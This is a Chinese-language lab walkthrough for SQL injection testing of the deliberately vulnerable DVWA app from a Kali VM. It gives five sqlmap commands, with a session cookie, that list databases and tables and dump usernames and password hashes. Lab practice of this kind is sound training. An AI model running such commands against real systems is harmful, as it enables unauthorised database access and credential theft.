0.測試準備
1)打開Kali虛擬機終端;
2)打開靶機OWASP,并通過瀏覽器,輸入IP地址進入dvwa的主頁,然后選擇SQL injection進入SQL注入的測試頁面
1.獲取DVWA的url和cookie
在輸入框中輸入1,顯示有內容,此時利用此URL進行SQL注入。
輸入document.cookie獲取頁面的cookie。去除remem_token字段的內容,用于下文的sql注入終端的cookie。
3.在終端開始測試
1)終端中輸入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
結果如下,說明找到了連個數據庫dvwa和information_schema,接下來獲取數據庫dvwa 中的表格。
2)在終端中輸入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
結果如下,發現有兩個表格,guestbook和users,接下來獲取users數據表中有哪些列。
3)在終端中輸入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
結果如下,說明users一共有六列,接下來獲取具體內容
4)在終端中輸入指令四,有提示信息則輸入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
結果如下,表格中的數據即顯示。
5)若數據庫中數據較多,可在終端中輸入指令五,只輸出用戶名和密碼字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump
結束!